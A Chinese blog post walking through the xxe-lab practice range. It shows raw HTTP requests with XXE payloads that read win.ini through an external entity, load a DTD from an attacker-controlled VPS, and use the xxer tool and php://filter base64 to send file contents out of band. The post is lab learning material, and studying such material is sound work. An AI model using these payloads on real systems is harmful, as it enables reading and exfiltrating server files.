xxe-lab学习

已于 2022-03-03 14:52:49 修改
阅读量891 收藏 1
点赞数
分类专栏: 实验测试 文章标签: python tkinter mysql
于 2022-03-03 14:27:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/win176489/article/details/123248152
版权

xxe-lab学习

xxe:xml外部实体注入,程序在解析xml文件时,引用了不安全的外部实体

环境如下
在这里插入图片描述
首先时回显的xxe,测试数据如下
在这里插入图片描述

POST /php_xxe/doLogin.php HTTP/1.1
Host: 10.10.6.168
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: application/xml, text/xml, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/xml;charset=utf-8
X-Requested-With: XMLHttpRequest
Content-Length: 63
Origin: http://10.10.6.168
Connection: close
Referer: http://10.10.6.168/php_xxe/


<user><username>cixin</username><password>1</password></user>

在reponse中msg把输入的username打印出来了可以作为回显位置

接着测试如下

在这里插入图片描述

POST /php_xxe/doLogin.php HTTP/1.1
Host: 10.10.6.168
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: application/xml, text/xml, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/xml;charset=utf-8
X-Requested-With: XMLHttpRequest
Content-Length: 162
Origin: http://10.10.6.168
Connection: close
Referer: http://10.10.6.168/php_xxe/

<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY cixin SYSTEM "file:///c://windows/win.ini">
]>
<user><username>&cixin;</username><password>1</password></user>

成功读取到了win.ini文件,接下来利用盲xxe方法来,先尝试能否引用外部dtd文件
首先vps开启http服务,然后发送数据包
在这里插入图片描述

POST /php_xxe/doLogin.php HTTP/1.1
Host: 10.10.6.168
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: application/xml, text/xml, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/xml;charset=utf-8
X-Requested-With: XMLHttpRequest
Content-Length: 167
Origin: http://10.10.6.168
Connection: close
Referer: http://10.10.6.168/php_xxe/

<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY cixin SYSTEM "http://vps地址/test.dtd">
]>
<user><username>&cixin;</username><password>1</password></user>

在这里插入图片描述
可以引用,利用xxer读取文件
github地址:https://github.com/TheTwitchy/xxer
尝试利用file协议读取d盘下的1.txt
在这里插入图片描述
修改ftp.dtd.template文件
在这里插入图片描述
使用python2启动xxer.py
在这里插入图片描述
将生成的payload复制到burp,发包
在这里插入图片描述

POST /php_xxe/doLogin.php HTTP/1.1
Host: 10.10.6.168
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: application/xml, text/xml, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/xml;charset=utf-8
X-Requested-With: XMLHttpRequest
Content-Length: 199
Origin: http://10.10.6.168
Connection: close
Referer: http://10.10.6.168/php_xxe/

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://vps地址/ext.dtd">%aaa;%ccc;%ddd;]>
<user><username>&cixin;</username><password>1</password></user>

成功读取到了1.txt文件内容
在这里插入图片描述
再读取win.ini,发现不返回数据
在这里插入图片描述
排坑过程
先将能读取到的1.txt修改为两行数据

在这里插入图片描述
利用xxe读取,发现读取失败,发现利用file协议读取再往出传值的话遇到换行就失败了,接着使用php伪协议php://filter/read=convert.base64-encode/resource来进行传值

修改dtd文件协议继续尝试
在这里插入图片描述

成功读取到编码字符串
在这里插入图片描述

在这里插入图片描述

再次读取win.ini也是没问题的
在这里插入图片描述
在这里插入图片描述
总结:php网站的xxe可以使用伪协议进行数据外带,另外也有其他支持外带的协议如下
在这里插入图片描述
在测试过程中,有xml数据的时候不妨试一试,可能会有意外收获

欢迎关注公众号

在这里插入图片描述

刺 心
关注
专栏目录
xxe-lab-master靶场下载安装包
09-10
xxe-lab-master靶场下载安装包
边打XXE-lab学习(一)
negnegil的博客
06-19 5242
一、简介及靶场搭建 简介 XXE(XML External Entity Injection)即XML外部实体注入。漏洞是在对非安全的外部实体数据进行处理时引发的安全问题。 XXE原理 XXE即XML外部实体注入 。我们先分别理解一下注入和外部实体的含义。 注入:是指XML数据在传输过程中被修改,导致服务器执行了修改后的恶意代码,从而达到攻击目的。 外部实体:则是指攻击者通过利用外部实体声明部分来对XML数据进行修改、插入恶意代码。 所以XXE就是指XML数据在传输过程中利用外部实体声明部分的“SYSTEM
DTD学习一(入门)
Joy的专栏
04-04 589
一 简介 文档类型定义(DTD)可定义合法的XML文档构建模块。它使用一系列合法的元素来定义文档的结构。 DTD 可被成行地声明于 XML 文档中,也可作为一个外部引用。 二、实例 1、如果一个DTD被包含在XML源文件中,如使用如下test.xml: 文档定义语法: 元素定义语法: 2、如果是一个XML文件引用一个外部的DTD文件,如下实例: te
XXE-Lab 项目教程
gitblog_00321的博客
08-08 244
XXE-Lab 项目教程 xxe-lab一个包含php,java,python,C#等各种语言版本的XXE漏洞Demo项目地址:https://gitcode.com/gh_mirrors/xx/xxe-lab 1. 项目的目录结构及介绍 XXE-Lab 是一个包含 PHP、Java、Python 和 C# 版本的 XXE 漏洞演示项目。以下是项目的目录结构及其介绍: xxe-lab/ ├── ...
xxe-lab靶场安装和简单php代码审计
永远是少年
12-23 3197
今天继续给大家介绍渗透测试相关知识,本文主要内容是xxe-lab靶场安装和简单php代码审计。 一、xxe-lab靶场简介 二、php xxe-lab靶场安装 三、xxe-lab靶场PHP代码审计
XXE漏洞原理及常见利用方式(以xxe-lab为示例)
weixin_43610673的博客
03-11 2607
这是一个有回显的XXE,这里读的文件是比较理想的,没有会被xml解析的字符,如果像下图中文件的内容一样就会引起xml解析报错(如Linux的/etc/fstab文件其中包含一些看起来像 XML 的字符),XML 解析器会尝试解析这些元素,但其不是一个有效的 XML 文档。而XXE是将XML元素注入变成外部实体注入,上面的基础知识部分已经提到了在DTD中声明外部实体,在xml中实体的作用相当于是一个已经定义的变量,可以在标签内使用,通过 & 符号进行引用。,是不会被解析器解析的文本。...
XXE-lab靶场搭建
MateSnake的博客
05-11 438
XXE-lab靶场搭建
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
XXE靶场中,我们可以模拟实际场景进行练习,例如在vulnhub的XXE Lab:1靶场中,首先识别靶机IP,使用工具如nmap扫描开放端口,然后通过目录遍历(如`robots.txt`)和Burp Suite抓包分析,确定XML数据传输。...
XXE - 防御策略-01
09-15
XXE 防御策略 XXE(Xml External Entity)漏洞是一种常见的 XML 解析漏洞,攻击者可以通过构造恶意 XML 文档来读取敏感信息或执行系统命令。为了防御 XXE 漏洞,需要了解其成因和防御策略。 一、XXE 漏洞消亡原因 ...
XXE - How to become a Jedi
02-20
### XXE漏洞详解:从入门到精通 #### XXE简介 **XXE(XML External Entity)** 漏洞是一种安全漏洞,它发生在应用程序解析 XML 数据时,未能正确过滤外部实体引用的情况。当一个恶意构造的 XML 文档被传入到易受...
XML schema 编辑工具 xxe-perso-4_9_1
11-19
"xxe-perso-4_9_1"看起来是一款专门针对XML Schema编辑的工具,版本号为4.9.1。这类工具通常提供以下功能: 1. **XML Schema设计**:用户可以通过图形界面设计复杂的XML Schema,定义元素、属性、数据类型、约束等...
WEB常见漏洞之XXE(靶场篇)
Javachichi的博客
11-10 704
其实在我们攻击具有XXE漏洞的服务器时,受攻击服务器进行了两次响应,如果查看受攻击的服务器上的日志会发现两条记录:一次是对XML进行解析后对另一台远程服务器的访问,一次是访问服务器自身上具有XXE漏洞的文件。技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
xss-lab通关之路
黑白的博客
10-12 5318
xss-lab通关之路
XXE
m0_51822230的博客
04-20 163
XXE原理介绍 XXE Injection即XML External Entity Injection。也就是外部实体注入攻击。漏洞是由在处理不安全的外部实体数据时造成的。 在了解xxe漏洞之前我们需要对xml有所了解。 xml xml与html的区别为:xml是传输和储存数据的。html的作用是显示数据的。 xml的结构是树结构,从根出发再到叶 <?xml version="1.0" encoding="UTF-8"?> //表达版本和编码方式 <note>
WEB常见漏洞之XXE(靶场篇)_220 vmware authentication daemon version 1
2401_84150530的博客
04-17 831
xxe-lab是一个使用PHP,Java,python,C#四种当下最常用语言的网站编写语言来编写的一个存在xxe漏洞的Web demo。靶场地址:https://github.com/c0ny1/xxe-lab
XXE漏洞复现(基于xxe-lab靶场)
weixin_73180072的博客
09-20 568
phpstudywindow10靶场源文件下载完毕后解压放置在phpstudy/www/目录下即可,访问(我这里解压后改了下文件夹名为xxe-lab,所以访问地址变了)
XXE-Lab安装配置完全指南
最新发布
gitblog_07587的博客
09-13 418
XXE-Lab安装配置完全指南 xxe-lab 一个包含php,java,python,C#等各种语言版本的XXE漏洞Demo 项目地址: https://gitcode.com/gh_mirrors/xx/xxe-lab ...
XXE-lab-master靶场:PHP_xxe
weixin_68416970的博客
07-30 925
XXE-lab-master:PHP_xxe的练习教程
泛微oa e-cology xxe 漏洞
08-17
泛微OA是一种常见的企业办公自动化系统,而XXE(XML外部实体注入)漏洞是指攻击者通过注入恶意的外部实体来读取或利用系统中的敏感数据。 泛微OA的XXE漏洞是由于系统对外部XML实体的处理不当所导致的。攻击者可以...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值